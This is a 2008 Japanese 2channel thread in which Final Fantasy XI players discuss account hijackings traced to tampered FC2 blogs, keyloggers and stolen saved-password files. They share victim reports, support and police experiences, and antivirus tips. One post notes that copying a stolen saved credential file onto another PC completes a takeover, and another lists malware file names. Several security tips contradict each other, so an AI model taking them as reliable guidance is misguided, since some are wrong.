////|::::    +   U | |||| !! !!||| :U   ;;; ;;;| ///
////|:::::       | |!!||l ll|| !! !!| |    ;;;;;;| ////
// / ヽ:::::       | ! || | ||!!|    ;;;;;;/// //
// // ゝ:::::::: :   | `ー----−' |__////

572 :既にその名前は使われています:2008/03/25(火) 10:17:16.54 ID:qu/cuoZy
>>519
403だがそこまでアホじゃないw別のいくつか使って検索したぜ

ブラウザもIEじゃなくて火狐辺りに変えようかな

573 :既にその名前は使われています:2008/03/25(火) 10:18:18.39 ID:ugsz64L4
ID:qlyvOiMi
は□eの犬ですか?

574 :既にその名前は使われています:2008/03/25(火) 10:19:22.10 ID:/kuEh7er
そんなに流行ってるのか〜
まぁ俺のアカでインしてもあるのはレベル8のモンクと金4000ギルだけどw

575 :既にその名前は使われています:2008/03/25(火) 10:20:15.70 ID:jlEhOE2N
お前ら卒業のチャンスだぞ!
fcブログ見まくれ!

576 :85:2008/03/25(火) 10:22:36.16 ID:7wVXiakm
>>521
私の場合は恥ずかしい話ですがセキュリティーソフトは入れていませんでした。
先週の始め頃にFF自体がかなり重くなっていたので、「不要なソフトは削除しちゃえ」って感じでアンインストール。
その前まではウィルスバスターを入れていましたが、更新とかはやったことはなかったです。

ブラウザはIE6でバージョンは6.0だと思います。
OSはWindowsXP、アップデートはしたことがありませんorz

ココで挙げられているサイトを回った事はないです。
からくりwikiとカンパニエwikiは見ました。
ブログも2〜3箇所見たことがありますが、覚えていません。
ただし、からくり士で検索して訪問した事は覚えています。

業者に強制的に落とされたのはたぶん、↓を見る限り23:40分頃だと思います。
http://live27.2ch.net/test/read.cgi/ogame/1205774044/862

普段から気をつけていれば防げる場合もきっとありますので、
みなさんもどうか被害にあわないような方法を選んでください。

577 :既にその名前は使われています:2008/03/25(火) 10:23:48.18 ID:RlorLQiV
なんか火狐に変えれば大丈夫みたいなふいんき(ry だが
それだけじゃだーめよー

Noscriptを使わなきゃINT高い人のIE以下だーよー

578 :既にその名前は使われています:2008/03/25(火) 10:25:16.53 ID:ymC/GTmn
>>570
垢ハックされた人がすぐ連絡したけど
自己責任の範囲だから、警察に連絡してくれ、で終わりだったらしい
スクエニは何もしてくれない

579 :既にその名前は使われています:2008/03/25(火) 10:28:43.07 ID:qlyvOiMi
>>573
犬とかアホか
普通に考えて当たり前のこともわからないで煽る暇があるなら
□がパンクするぐらいにどんどん苦情送ったれ、あほ

ひとまずいまフォームからこういうの送った。
文面はどうでもいいからさっさと24時間サポセン対応しろと送ったれ

最近、アカウントハックによる不正アクセスの被害が増えているにもかかわらず、
サポートセンターが24時間、 365日の対応していないのはおかしいのではないか。
金曜夜に被害にあえば、月曜まで、祝日等あればその分の間、問い合わせることも出来ず、
結果、ハックによる被害の拡大を促すことになっているのではないか。スクエアエニックスとして、
この点をどう考えるのか、もはやユーザーのみに対応させるのは限界に来ているのではないか。
早急に出来る対策として、サポートセンターの24時間対応および土日祝日を含む365日対応を
すべきではないのか。ユーザーが安心して遊べるためにも、対応していただきたいと思う。

580 :既にその名前は使われています:2008/03/25(火) 10:28:47.34 ID:7wVXiakm
それと気になっていた事があったので報告です。
私はPOLにログインする時には、自動でログインするようにした事はありません。
IDを選んで、パスワードを手入力していました。
どこかのレスで、手入力にしておけば…のような書き込みがあったので報告です。

581 :既にその名前は使われています:2008/03/25(火) 10:30:35.74 ID:n/S3mmPO
>>570

アイテム保障とかは一切書いて無いなぁ


582 :既にその名前は使われています:2008/03/25(火) 10:32:07.08 ID:gV659xLe
朝起きたら垢ハックスレ立ちまくりワロタ
自分もブログではないけどサイト持ってるんで注意喚起しといたよー。
サイトハックは聞いたこと無いけどありえなくは無いから気をつけようと思う。

この件を広めることしか出来ない、自衛を促すことしか出来ないのが悔しい。
でも出来る限りのことはしたい。絶対許せない。

583 :既にその名前は使われています:2008/03/25(火) 10:33:11.55 ID:gV659xLe
>>580
パス何桁?初期のまま?

584 :既にその名前は使われています:2008/03/25(火) 10:33:45.44 ID:n1eE+/LN
あくまで救済できることがあるかもしれない程度で
ここで報告されてきたGMとのやりとりと変わらないね内容は

585 :既にその名前は使われています:2008/03/25(火) 10:34:30.47 ID:kr3RV4oq
とりあえず■は対策できるまで
競売停止
全てのアイテムをエクレア化にするとか

586 :既にその名前は使われています:2008/03/25(火) 10:35:31.66 ID:kr3RV4oq
あっ宅配、トレード、鯖移動も停止しないとか

587 :既にその名前は使われています:2008/03/25(火) 10:35:34.36 ID:FJw0pWtB
垢ハックってほんとうにあるのか?まわりに被害がないから実感がないんだが
まだ都市伝説感が抜けない

588 :既にその名前は使われています:2008/03/25(火) 10:36:35.82 ID:gV659xLe
>>587
こういうのが抜かれる典型例だなw

589 :既にその名前は使われています:2008/03/25(火) 10:37:46.78 ID:/kuEh7er
>>587
UchinoLSの20人ほどは特に何もないようだが
この乱立の仕方はちょっとおかしいと思うw

590 :既にその名前は使われています:2008/03/25(火) 10:38:47.62 ID:zt9O0nlM
なんで業者がログインするとこっちが落とされて
パス変えられる間もなく ログインしようとするとイン出来ないの?

591 :既にその名前は使われています:2008/03/25(火) 10:45:30.17 ID:W1flgVyY
垢ハックの注意は必要だが、垢ハックスレが乱立しすぎるのはどうかと思うぞ。


592 :既にその名前は使われています:2008/03/25(火) 10:46:18.67 ID:n1eE+/LN
>590
向こうは盗めたらインする前に変更予定のパスを決めておいて
インしてすぐにパスを変更しているんじゃないかな
手動か自動かはわからないけど、仕事wだからね
その辺りは何度も試行していると思う
俺らはどれだけ素早く出来るかなんて試したりしないしw

593 :既にその名前は使われています:2008/03/25(火) 10:47:53.71 ID:Yq3GlEaf
垢ハックについて電凸しようと思うんだが
電話内容を記録するにはどうすればいい?
市販の長細いボイスレコーダー?

594 :既にその名前は使われています:2008/03/25(火) 10:48:21.55 ID:ymC/GTmn
>>589
このスレ乱立を見ても、これまで以上に垢ハックがおきたのが明らか

595 :既にその名前は使われています:2008/03/25(火) 10:48:33.34 ID:7wVXiakm
>>583
8桁です。初めはそのまま使っていましたが、今月の初めに1度変えました。
変えたパスワードも8桁です。
ちょっと思い出したんですが、業者にログインされ、
必死になって変えたパスワードは初期のものでしたね…orz
ここで違うパスワードを入力していれば、もしかしたら大丈夫だったのかもしれません。

596 :既にその名前は使われています:2008/03/25(火) 10:49:16.40 ID:wWbeLRfX
■e追加ディスク発売じゃなくて解約ディスク作るのうまいなwwwwwwwwwwwww

597 :既にその名前は使われています:2008/03/25(火) 10:50:35.83 ID:/kuEh7er
アカハックとか起こるたびに思うんだ
頭のいいやつもいるんだな、と。

598 :既にその名前は使われています:2008/03/25(火) 10:51:18.32 ID:U5OFwJAr
FF内で暴動起こすしかないな。
講義の意思を強調するのにはもってこいだと思うけどな。
明日はわが身。参加する奴増えるだろう。

599 :既にその名前は使われています:2008/03/25(火) 10:53:22.07 ID:gV659xLe
>>590
多重ログインされるとどこまで落とされるか知らないけど、FFトップにもどるだけ?
プレイオンラインからも排除されるの?

FFトップまでしか戻されないならPOLからログアウトしてからログインしなおして
速攻でパス変えるとかしないとダメっぽくね

600 :既にその名前は使われています:2008/03/25(火) 10:57:06.22 ID:sGs0zFvT
>>576
はあ?お前馬鹿ってレベルじゃねーわ。
やられるに決まってるだろが。

601 :既にその名前は使われています:2008/03/25(火) 10:59:20.78 ID:rt8/XeXx
>>598
暴動というかネ実的には禿げでしょう。
サポセン24時間対応要求とかなら、まだ被害受けてない人にもいいかもしれん

602 :既にその名前は使われています:2008/03/25(火) 11:02:21.96 ID:U5OFwJAr
>>601
そういうこと。こういう抗議ってどうなるんだろうな。
今までは特定のキャラクターに対してだけど
今回については■eに直接要求だからな。
無能のGMが出てきたところで話にならないし
禿げガル行進で騒いでどうなるか知りたいところではある。

603 :既にその名前は使われています:2008/03/25(火) 11:04:54.44 ID:RdQuTlo9
>>600
たしかにひどいがネトゲユーザーが100パー「対策ばっちり、IEプゲラw、アンチウイルス導入済み」
という人ばかりじゃないからな・・・。
普通に電気店やゲーム屋でかってやってるのもいるだろう
が、、確かにひどいな。。。。。

604 :既にその名前は使われています:2008/03/25(火) 11:07:24.51 ID:V1FUYBaL
というか運営陣はアカハックされた奴のPWや業者と目されている奴のPWをぶっこ抜いて
相似性とか類似性を考え付かないのかね。
まさか動的かつ無重複のランダムPW(6a2fg9e4b0sc1とか)をハック毎につけるわけじゃないだろうし

しっかしおまいら考えてみろよ。業者にSTTをつけたように、今回のハック騒ぎを「運営の対応を改善(迅速に)する」以外で
機械的にできると思うか?FC2ブログの件とかまさに■eにとっては言うだけしかない、蚊帳の外だろ。
(それとも一部MMOのようにblog(というかSNS)を自社管理で扱うか?)

もしもやるとしたらクライアント側に保存する情報からPWを抜く、という手法しかないわけだがそれでもキーロガーであぼんだ。
じゃあキーロガーを検知するソフトを作れという流れになったとしても■eがキーロガー検知ソフトを作ると思うか?

605 :既にその名前は使われています:2008/03/25(火) 11:08:33.31 ID:WS4YDPYF
これもしかしたらスレに書き込む業者対策になるかな

串迎撃部隊@2ch掲示板 -- Boo2008 --
http://boo.2ch.net/index.html

606 :既にその名前は使われています:2008/03/25(火) 11:10:00.52 ID:FJw0pWtB
もし仮にアイテム戻しが実装されたら、知り合いのPC(漫画喫茶等も)でログインしてアイテム処分して
ハックされましたって通るんかね

607 :既にその名前は使われています:2008/03/25(火) 11:12:02.85 ID:skDgfdHL
キーロガー対策ならID MANAGERというソフトがあり
クリップボードも使用しないのでそこからもpass漏れることはない。
PS2でしかFFしないのでPOLログインで使用できるかは不明。

608 :既にその名前は使われています:2008/03/25(火) 11:15:05.39 ID:d16ZpNUU
>>604
そこら辺は無理だとしても、被害にあったときに
迅速に対応できるようにはして欲しいだろ

今は完全に放置だぜ?イン出来ないのに本人がインして報告しろ
土日祝日はやってません。17時までしか受け付けません。
救済も一切ありません。お前が自分で業者にパスを教えたんだろ?な対応

609 :既にその名前は使われています:2008/03/25(火) 11:16:46.89 ID:RdQuTlo9
>>606
おまえのやりたいことがわからん。。知り合いに嫌がらせしたいだけか?
現状■から言われたらしいことは「救済されるアイテムはエクレアか本人しか持ち得ないアイテム」だけだ

610 :既にその名前は使われています:2008/03/25(火) 11:17:45.00 ID:qr3SW834
>>606
戻されるにしても、警察に被害届けだして不正ログインと認められた場合だけでしょう

611 :既にその名前は使われています:2008/03/25(火) 11:22:25.57 ID:OkyXvjGD
今までは全く知らない人が被害>フレのフレ若しくは知り合いが被害>裏空リンバスのLSメンが被害
>そしてついに一緒に遊ぶフレが被害にあった。
 確実に俺にも近づいてる気がして怖いのでもうPS2のみでやることにした。

612 :既にその名前は使われています:2008/03/25(火) 11:24:04.39 ID:FdVfr1o9
ソースチェッカーオンラインを知ったのだけど、
fc2でもとりあえずこれで安全度100%のとこなら平気でしょうか?


613 :既にその名前は使われています:2008/03/25(火) 11:25:13.84 ID:FJw0pWtB
>>609>>610
エクレアとかだけかよかった。警察沙汰になったあとなのねこれもよかった
不正にアイテム増殖できちゃいそうで気になった

614 :既にその名前は使われています:2008/03/25(火) 11:26:16.27 ID:gV659xLe
とりあえずパス手打ちにした。
完璧な対策なんてないけど、少しでも抜かれる可能性低いほうが良いよね。

というわけでオススメのキーロガー対策ソフトPLZ

615 :既にその名前は使われています:2008/03/25(火) 11:27:35.18 ID:erjVAm8i
FFに関してはパスワードは一々入力しないほうが安全だなw
俺は最初に入力して記憶させてから一度も変えたことがない。

616 :既にその名前は使われています:2008/03/25(火) 11:29:38.86 ID:KlTCqiN9
今月FF入ってないが、なんかひでーことになってるみたいだな。

FC2の方からは、何も言ってこないのか?
■eは対応決めるまでに時間かかるだろうから、
とりあえず被害の拡大を食い止めてほしいところだ。

しかしこれ、どう対応すんだろ……。
アカごとに別の日付に巻き戻す、とかできるならやってほしい
レアアイテムが増殖するかもしれんが、消えるよりゃマシだろ

617 :既にその名前は使われています:2008/03/25(火) 11:30:04.19 ID:xV7avn5I
>>612
まったく作ったばっかりのFC2をチェックしても、警告みたいなのでるよ。
アクセス解析とかそういうのにも反応するから、わからないならあんまり当てにしないほうがいい。
すなおにウィルスソフトとかいれて、IE以外で見るのが安全かな。

618 :既にその名前は使われています:2008/03/25(火) 11:30:40.55 ID:ZC7LgN8X
http://find.2ch.net/?STR=%A5%CF%A5%C3%A5%AF+board%3A%A5%CD%A5%C8%A5%B2%BC%C2%B6%B7&COUNT=10&TYPE=TITLE&BBS=ALL

「ハック」が含まれているスレが14個・・・
そのうち中身の無いスレがなんとも多い事か・・・

619 :既にその名前は使われています:2008/03/25(火) 11:30:54.74 ID:ymC/GTmn
>>615
・・・

620 :既にその名前は使われています:2008/03/25(火) 11:34:24.37 ID:gCK0NHd/
パス手で入力、しかもスクリーンキーボード使えばまぁかなりマシになるだろ。

>>619
もう手遅れだよ・・・ 放って置いてあげよう

621 :既にその名前は使われています:2008/03/25(火) 11:34:57.77 ID:JIu1wKVr
ちなみに、自分の場合

最近になってウィルス3個検出。IDとパスは抜かれてない。
IEは自動で最新、ノートンも最新。

IEのキャッシュから検出では無くて、毎日しているバックアップファイルから検出。
なぜかは不明

622 :既にその名前は使われています:2008/03/25(火) 11:35:52.93 ID:FdVfr1o9
>>617
警告がでるところは見なければいいので、問題ないのですが、
安全度100%のとこでも危険な可能性があるのか知りたかったのです。
あと、現時点で自分のPCがやられてるかどうかを調べるにはカスペルで完全スキャンだけで十分でしょうか?

623 :既にその名前は使われています:2008/03/25(火) 11:38:09.14 ID:5K38i1Dh
リネージュやROのほうは、キーロガーでパス取ってるんだろうか
それともFFみたいにオートログイン機能あり?

624 :既にその名前は使われています:2008/03/25(火) 11:38:29.54 ID:zXG1OqGI
>>615
お前・・・逆だろjk・・・
業者かてめえ!

625 :既にその名前は使われています:2008/03/25(火) 11:40:49.79 ID:XSRb3bc4
IDとパスを記録したファイルを転送され
それを他PCに上書きすると乗っ取り完了

お手軽過ぎんぞマジで
クレカ登録してたらガンガン使われたりな

626 :既にその名前は使われています:2008/03/25(火) 11:41:27.56 ID:xV7avn5I
>>622
それいっちゃうと、FC2(つーかサイトの大半)見れないよ。
安全度100%なんてない。

自分がやられてるかどうかは、完全スキャンでほぼ大丈夫だと思うけど、100%かといわれると言い切れないだろう。

昔は、UGのサイトは知識ないなら見るなって感じだったけど
いまは、知識ないならネットすら見るなって感じかな?
嫌な時代ですね。

627 :既にその名前は使われています:2008/03/25(火) 11:42:56.02 ID:7wVXiakm
>>600>>603
恥ずかしい限りですorzもう…ホント懲りました。
今度からはしっかり防御していきます<(_ _)>

628 :既にその名前は使われています:2008/03/25(火) 11:44:28.69 ID:erjVAm8i
>>624
キーロガーでパス抜かれてる手口が多いんだから少なくとも逆じゃないだろう?


629 :既にその名前は使われています:2008/03/25(火) 11:49:52.56 ID:SyInp+jK
普段からWindowsUpdateやセキュリティソフトの定義ファイルをこまめに更新してる人でも今回はハックされたという人がいる

いつもは普通に見れてた有名な情報サイトやブログにいつの間にか罠が仕込まれていた
業者がどうやってブログのIDやパスを盗み出したかは不明
最新版定義ファイルのノートンやウィルスバスターやAvast!も無反応だった


これ以上自衛しろとか言われても「ネットを一切使うな」、くらいしかないんだよな・・・
この現代社会でネット使うなっていうのも現実的に難しいし
「ネトゲやってるのでアカウント守りたい」「じゃあネット使うな」
これじゃ本末転倒だし

630 :既にその名前は使われています:2008/03/25(火) 11:50:40.96 ID:QVf8SjqO
>>628
いまのとこキーロガーより、保存したパスを抜かれるほうが多いみたいだよ。
だからPASS入力してないほうが安全!は無い。
手入力だから大丈夫ってのも無いけど。

631 :既にその名前は使われています:2008/03/25(火) 11:50:46.30 ID:ugsz64L4
アカハックされた廃人が自殺!
とかならないと□eは重い腰を上げなそう

632 :既にその名前は使われています:2008/03/25(火) 11:50:52.90 ID:QTa0bv0n
>>628
いやほとんどのケースは記憶させているパスの抜き取りでしょ?

633 :既にその名前は使われています:2008/03/25(火) 11:52:35.37 ID:FdVfr1o9
>>626
何度もレスありがとう。
名前入れ忘れましたが、>>537>>546が最初の経緯でして、
>>546のアドレスをソースチェッカーオンラインで調べると安全度100%と出たので、
とりえず、現時点では大丈夫という安心を得たかったのです・・・
ネット閲覧とFFのPCが同一という環境でやってたのが悪いのはわかっているのですが、
今日のでネット閲覧専用PC導入を本気で考えています。

634 :既にその名前は使われています:2008/03/25(火) 11:56:24.83 ID:erjVAm8i
>>630
>>632
そうかそうか悪かったな。
ちなみに俺はPC2台でFFのほうは専用端末になってる。



635 :既にその名前は使われています:2008/03/25(火) 11:58:20.57 ID:KlTCqiN9
年度末だから予算取れなくて対応できません

なんてこと言わないよな? ■e……

636 :既にその名前は使われています:2008/03/25(火) 12:00:04.57 ID:QTa0bv0n
なぜ逆ギレ風味w

637 :既にその名前は使われています:2008/03/25(火) 12:00:21.92 ID:xV7avn5I
>>633
セキュリティ意識が高いのはいいけど、そこまで神経質になると、ほんとネット見れなくないか?
ネット閲覧とFFのPCが一緒で悪いってこともないと思うよ。

心配なら、PSかX箱をお勧め。俺はX箱お勧め。w

638 :既にその名前は使われています:2008/03/25(火) 12:00:49.92 ID:erjVAm8i
じゃあとりあえず、■にはパスワードファイルを移しただけで動くってのを改良してほしいんだが。

639 :既にその名前は使われています:2008/03/25(火) 12:01:39.12 ID:QVf8SjqO
>>633
ソースみてJavaScriptで変なアドレス入ってなさそうなら平気だとおもう。
ソースチェッカーでそこそこ安全なら大丈夫でしょう。
ただ、これからはfc2アドレスには注意が必要だね。

どーしても、モヤモヤするなら改竄が流行ってるfc2踏んでしまいましたとかで
勇気がなくて踏めない人のための鑑定スレ
http://pc11.2ch.net/test/read.cgi/hack/1199083602/
で鑑定してもらうとか。

640 :既にその名前は使われています:2008/03/25(火) 12:02:15.92 ID:a+CNHbXe
友人の箱でやってるの見たけど思ってたより綺麗だったわ
箱でやるのももいいかもな
ボタンに慣れてしまえばいっかww

641 :既にその名前は使われています:2008/03/25(火) 12:03:19.52 ID:ugsz64L4
愉快犯のウイルスと違って
生きる為に必死な乞食がやってるだけに恐ろしい

642 :既にその名前は使われています:2008/03/25(火) 12:06:32.68 ID:lzAZqpVk
キーロガーの認識あるならパソコン別にしたら?

銀行や証券のパスワードを抜かれるかも知れないのに。

643 :既にその名前は使われています:2008/03/25(火) 12:07:44.91 ID:w09AiedE
ブログ引越し考えて他人が使ってるブログを検索してみたが
FC2使ってるやつ本当多いね。
しかもアクセス多いところは一日70万アクセスとか…
FFなんか大手つってもせいぜい1000〜2000程度だし
運営から見たら特定ジャンルの僻地ブログがハクられようと痛くも痒くもないのかな。


644 :既にその名前は使われています:2008/03/25(火) 12:13:42.22 ID:nfdnKwPN
んなこたない
クレカ情報とか抜かれてもおかしくない状況なんだから

645 :既にその名前は使われています:2008/03/25(火) 12:14:49.92 ID:n1eE+/LN
FC2<嫌ならやめてもいいんじゃぞ?

■eにとって現状は想定の範囲内らしい

646 :既にその名前は使われています:2008/03/25(火) 12:15:08.53 ID:FdVfr1o9
>>637
ありがとう。
こういうの初めてで昨日はカスペルの検索結果が気になって寝付けなかった・・・
かなり寝不足。
PS2ありますよ、パス変更はそちらでやりました。
でも綺麗というだけでPCでやってました。

>>639
おお、そんなスレあるのですね。
最近見たfc2は昨日のだけですし、ソースチェッカーオンラインの結果の、
右枠をみても、自分には知識無くてサッパリなので、そこにお願いしてみようと思います。
ありがとう。

647 :既にその名前は使われています:2008/03/25(火) 12:16:20.74 ID:fAiOj5Ix
>>635
年度末だからこそ来年度予算をもぎりとるために開発費を使い切るんだ

648 :既にその名前は使われています:2008/03/25(火) 12:17:01.49 ID:Q74sBmBw
糞スレ乱立業者
ID:MAhuB7JG
ID:KZFpz3y9

649 :既にその名前は使われています:2008/03/25(火) 12:17:53.00 ID:lzAZqpVk
その割にはFFのアカウントしか興味ないみたいだなネ実民はw

650 :既にその名前は使われています:2008/03/25(火) 12:26:14.21 ID:LtRgK+Go
>>553
北米はアイテム返してくれるのかよw
俺のフレは被害届け警察に出してもエクレアも返してもらえないって言ってたぞ

651 :既にその名前は使われています:2008/03/25(火) 12:27:06.43 ID:fAiOj5Ix
>>649
身近な問題なだけに他の連中に訴えやすいしな。
非FF11系FC2メンバーの「そんなの関係ねー」を見ていればわかるとおもうが。
たとえばこの板で(今回の件が全く無かったとして)
「FF11のブログが垢ハックウイルス入りに改竄される件」と「FC2ブログが誰かに改竄される件」
というスレを立てた場合、前者のほうがこの板住民の興味を引くだろ。

652 :既にその名前は使われています:2008/03/25(火) 12:28:16.66 ID:fAiOj5Ix
>>650
そこでGMに問い詰めるんだ!

653 :既にその名前は使われています:2008/03/25(火) 12:29:43.77 ID:Lh3BMw3A
今入ろうとしたらパスワード変わってる!!
サポセン混雑して電話繋がらないけどハック対応専用窓口ある???

654 :既にその名前は使われています:2008/03/25(火) 12:30:57.08 ID:ugsz64L4
被害者ktkr

655 :既にその名前は使われています:2008/03/25(火) 12:32:15.24 ID:CE2JkWXV
スクウェア・エニックス インフォメーションセンター
0570-003-399

656 :既にその名前は使われています:2008/03/25(火) 12:32:52.14 ID:erjVAm8i
>>653
ないよ。
こりゃ、当分PS2か箱でやったほうがいいな。

657 :既にその名前は使われています:2008/03/25(火) 12:33:45.10 ID:xV7avn5I
前日に自分でパス変更して、忘れてるとかじゃないだろうな?

>ハック対応専用窓口
そんなのあったら、ここまで騒ぎになってないだろう・・・。
がんばって電話するしかないだろうな。がんばれ。

658 :既にその名前は使われています:2008/03/25(火) 12:33:56.00 ID:pn98/92E
>>526
国センにクレーム入れるぐらいか?
後は政治家の事務所に陳情入れるとか?
ネトゲ専用の活動家になってこういった不正アクセスとかの問題に取り組むとか?

659 :既にその名前は使われています:2008/03/25(火) 12:36:57.87 ID:UPF6TRxO
>>553
なんだこれ・・・





なんて書いてあるか解らん

660 :既にその名前は使われています:2008/03/25(火) 12:37:48.09 ID:7wVXiakm
>>653
繋がるまで頑張ってかけてみて!

661 :既にその名前は使われています:2008/03/25(火) 12:40:32.74 ID:erjVAm8i
まあ繋げってからが問題なんだけどな・・・
一度でもサポセンにかけたことのあるやつは知ってると思うが、
基本的にこちらの質問を理解しないで回答してるからね。
定型の回答しかかえってこないから、会話してて???となるよ。


662 :既にその名前は使われています:2008/03/25(火) 12:40:48.97 ID:hpQdjsfd
週末が比較的おとなしかったから安堵してたのに、ここ二日くらいで大変なことになってるな
もう金曜じゃなくてサポセンが閉まってる時間は奴らの活動時間と見た方がいいか

663 :既にその名前は使われています:2008/03/25(火) 12:41:32.87 ID:gnv8Cqm9
「パスは入力保存してた」って展開に100メセタ

664 :既にその名前は使われています:2008/03/25(火) 12:43:07.87 ID:ZC7LgN8X
>>659
Google先生に訳してもらった

最近では、それはスクウェアエニックスの注目を集めて来て不幸な数のアカウントにアクセスできるように選手たちが失われた彼らのために、第三者から侵害になる。
このように、我々は、プロセスを考案することができるこれらの選手たちを取り戻すに各自のアカウントにアクセスできるようにします。

効果的なすぐには、プレイオンライン情報センターの支援が開始さを失ったこれらの顧客のアカウントにアクセスできるようにすること。
を通じて身元確認は、プレイオンラインリピートされる情報センターアカウントへのアにより侵害されていますクセスを、元の登録者です。
このプロセスは、現在のところに入って行くのを助ける効果の復元、元のアカウントにアクセスできるように可能な限り速やかに登録します。
1回のアクセスを回復され、顧客は、その後の弁済を求めることができるために失われたアイテムのアイテムごとに私たちの現在の政策を復元します。

プレイオンライン情報センターまでご連絡の場合は、すぐに見つけるのアカウントにアクセスできるようにする必要が失われた。
我々を支援することができることを保証できませんが、これらすべてのケースでは、しかし、我々は、アカウントへのアクセスを試みる際に復元可能です。
また、お問い合わせをできるだけ早く、それは私たちの行動を許可を制限して、アカウントの変更、およびヘルプへのアクセスの復元オリジナルを可能な限り速やかに登録します。

665 :既にその名前は使われています:2008/03/25(火) 12:45:28.50 ID:Ev13MfKv
AVGの無料ソフトをDLしてスキャンしてみたら
>>24のウィルスが見つかったよ
こええええぇぇ
PS2ユーザーだから良かったものの・・・

666 :既にその名前は使われています:2008/03/25(火) 12:46:04.39 ID:pn98/92E
>>664
日本語でおk

667 :既にその名前は使われています:2008/03/25(火) 12:46:06.15 ID:iZibIXDg
RealPlayerの件。
いつからだか知らんがこっそり11.0.2(6.0.14.802)に更新されてる
(解凍したタイムスタンプを見ると14日以降だと思う)。
エロサイト巡回などでどうしても使う場合は拾いなおしておくこと。

668 :既にその名前は使われています:2008/03/25(火) 12:50:53.71 ID:zn2Aq+P2
ラグナロクオンラインでも垢ハック大流行して、それに嫌気さしてFF11来たのにこれだからなあ・・・

669 :既にその名前は使われています:2008/03/25(火) 12:51:49.18 ID:Ev13MfKv
俺みたいにウィルスソフト高くて買えねー奴は
>>4に書いてる無料のをダウンロードした方が絶対いいよ
有料の方がいいんだろうけど、やらないより絶対マシ

670 :既にその名前は使われています:2008/03/25(火) 12:51:59.97 ID:GfU2CfMk
今は登録者多いネトゲはどこもそうだよ。

671 :既にその名前は使われています:2008/03/25(火) 12:52:57.30 ID:1hOfOJoB
MSEXEC.DLL
SHELL32.EXE
SVCHOST.EXE
SENS.DLL

死亡確認w

672 :既にその名前は使われています:2008/03/25(火) 12:53:54.20 ID:1hOfOJoB
NTTの光プレミアムルーター役立たずだな、おい


673 :既にその名前は使われています:2008/03/25(火) 12:55:39.81 ID:LtRgK+Go
>>652
今フレに連絡入れたらちょうど休みだったみたいで即電話して断られたってさw
帰国子女の奴だから英語GM呼んどけって言っといた

674 :既にその名前は使われています:2008/03/25(火) 12:56:13.01 ID:GfU2CfMk
そりゃ設定してなければ素通りですがな。

675 :268:2008/03/25(火) 12:58:29.73 ID:vhRd0OHh
朝、ここで他鯖に移転させられたことを知った>>268です。
昼休みにサポセン、警察に連絡したので経過をのせときます。

【サポセン】
・本人確認に手間取るもパスワード変更してもらった。
・アカウントの情報は保持するようにしたので警察へ連絡して。
・警察から捜査協力要請きたら協力する。
・犯罪性が確認できたら救済は検討するがどこまでできるかはわからない。
・保留音がグスタで開始当初を思い出し切なくなった。

【警察】
・関係部署にあげてみるが捜査はするかどうかわからない。
・捜査の可否、経過、結果は教えられない。
・管轄警察にはコンピュータに詳しい人はいない。すくえに?何それ?

警察がネック(´・ω・`)めんどくさそうに対応された。
携帯からゆえ改行見づらかったらすまん。

676 :既にその名前は使われています:2008/03/25(火) 12:58:40.27 ID:pn98/92E
>>669
なら何で月額課金ゲームで遊んでるんだよw
フレッツでやってるならフレッツウィルスクリア、ッて言う
月額数百円のウィルスバスターが使える。

677 :既にその名前は使われています:2008/03/25(火) 13:00:15.88 ID:auLaoDR9
だめだこりゃo(`д´o)

678 :既にその名前は使われています:2008/03/25(火) 13:00:45.65 ID:Lh3BMw3A
ねーのかよ糞!!
つながらない!
リアフレに電話してログインしてもらってGM呼んでもらった。
普通プログラム的な対応は時間かかるとしてそれまではアナログに電話で対応できるハック窓口を作るだろ・・・
お客様をなんだと思ってんだ!??
マジ許千    

つか物を業者キャラに渡すんだよな?
だったらそこから追えないの?

679 :既にその名前は使われています:2008/03/25(火) 13:02:01.78 ID:44p7HLjp
ネトゲの苦情は国センじゃねーよ
通産省の情報なんとかっつーとこだ
国センじゃ意味ない、前電話していわれた


680 :既にその名前は使われています:2008/03/25(火) 13:03:04.33 ID:gV659xLe
>・保留音がグスタで開始当初を思い出し切なくなった。

いやがらせかwwwwwww

笑えないな。
警察には多少誇張して素人にもわかりやすいように
「ハッカーにやられました。パソコンの中の情報盗まれました」
とか言ってみたらダメなのかな。ウソではないし。
オンラインゲームとかアカウントとかいうとむこうは「はぁ?」ってかんじになりそ。

681 :既にその名前は使われています:2008/03/25(火) 13:04:15.46 ID:zn2Aq+P2
スクエニ→警察行け^^;
警察→スクエニ?何それ、ゲームごときで警察動かすなよ^^;

駄目だこりゃ

682 :既にその名前は使われています:2008/03/25(火) 13:04:53.21 ID:CE2JkWXV
鯖移動手数料で今月の売り上げウハウハだろうな、■e

683 :既にその名前は使われています:2008/03/25(火) 13:12:03.89 ID:J6HuyFWS
>>682
クレカで勝手に使われた場合、警察・カード会社に連絡したりしても
被害者の救済は無いのかな?

684 :既にその名前は使われています:2008/03/25(火) 13:15:15.66 ID:NSDvwDJZ
>>683
その救済はカード会社がするんじゃまいか?
少なくとも■は登録されたカードから正規のルートで
お金受け取っただけ、ってなるだろうし。

685 :既にその名前は使われています:2008/03/25(火) 13:15:17.62 ID:WM1LoyeU
カード会社が不正使用と認めれば返済される。


686 :既にその名前は使われています:2008/03/25(火) 13:15:59.05 ID:OHH8MISE
ふと思ったんだが、こんだけ大規模なハックが行われてるとこ見ると
相当なアイテム・ギルがだぶついてるよな?

それをRMTで現金化できるくらい「買い手」がいるって事?

被害者からの報告で足が付きやすい上に、油断すればSTTが毎月垢バンしてくる状況。
ギル化したら、すぐに売り抜けたいはずなんだよな。
バハ鯖に一人で4千万ギル相当失った奴もいるし、消費がどうにも追いついてなさそうなんだが。

荒らされまくってるJPでこんだけ売り上げが出せるとは信じたくないし
EU・NA圏で売りさばいてるんかな。向こうじゃ垢ハックは下火?てか俺ら民族単位でカモ?

稼ぐ連中と売る連中で意思統合されて無く、前者が調子乗ってるだけってオチもありそうだが・・・

687 :既にその名前は使われています:2008/03/25(火) 13:18:54.97 ID:WM1LoyeU
>>686
ヒント:
RMTしてまでゲームしてくれる客は依存度が高い客。
なるべく数は減らしたくない。

688 :既にその名前は使われています:2008/03/25(火) 13:20:39.74 ID:J6HuyFWS
>>684-685
ありがd。
ちょっと安心したけど、やっぱりハックされないように心がけるのが
一番だよね。

>>685
IDがWMなのにカード詳しいですね。

689 :既にその名前は使われています:2008/03/25(火) 13:22:25.37 ID:V1FUYBaL
>>686
>てか俺ら民族単位でカモ?
ウェッブは世界規模で広がっているのですよ?

「アカを知らない連中は全員アカだ」という名言がありますが、ことウェッブ上では
「中華を知らない連中は全員中華だ」と言っても過言ではない。

